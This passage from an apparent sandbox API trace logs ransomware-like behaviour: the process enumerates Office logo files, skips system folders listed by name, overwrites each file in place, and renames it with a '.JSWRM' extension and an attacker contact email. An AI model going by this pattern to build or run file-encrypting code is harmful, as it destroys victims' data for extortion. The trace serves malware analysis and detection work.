returned 42 [0133.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.935] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1664) returned 1 [0133.935] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.935] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x680, lpOverlapped=0x0) returned 1 [0133.937] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.937] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x680, lpOverlapped=0x0) returned 1 [0133.937] CloseHandle (hObject=0x238) returned 1 [0133.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.939] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-white_scale-100.png", cAlternateFileName="VI77E0~1.PNG")) returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned 1 [0133.939] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.940] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1920) returned 1 [0133.940] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.940] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0133.941] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.942] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0133.942] CloseHandle (hObject=0x238) returned 1 [0133.942] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.943] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-white_scale-140.png", cAlternateFileName="VI3512~1.PNG")) returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned 1 [0133.943] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.944] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2187) returned 1 [0133.944] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.944] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x880, lpOverlapped=0x0) returned 1 [0133.962] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.962] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x880, lpOverlapped=0x0) returned 1 [0133.963] CloseHandle (hObject=0x238) returned 1 [0133.963] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.964] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-white_scale-180.png", cAlternateFileName="VI82A6~1.PNG")) returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned 1 [0133.964] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.965] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3146) returned 1 [0133.965] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.965] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0133.967] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.967] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0133.968] CloseHandle (hObject=0x238) returned 1 [0133.968] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.969] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x67f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.contrast-white_scale-80.png", cAlternateFileName="VIEC8E~1.PNG")) returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned 1 [0133.973] lstrcmpiW (lpString1="VisioLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogoSmall.contrast-white_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.974] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1663) returned 1 [0133.974] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.974] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x670, lpOverlapped=0x0) returned 1 [0133.976] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.976] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x670, lpOverlapped=0x0) returned 1 [0133.976] CloseHandle (hObject=0x238) returned 1 [0133.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.977] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogoSmall.scale-100.png", cAlternateFileName="VI400A~1.PNG")) returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2=".") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="..") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="...") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="windows") returned -1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="recovery") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="perflogs") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="system volume information") returned 1 [0133.977] lstrcmpiW (lpString1="VisioLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0133.977] WideCharToMultiByte (in: CodePage=0xfde9, 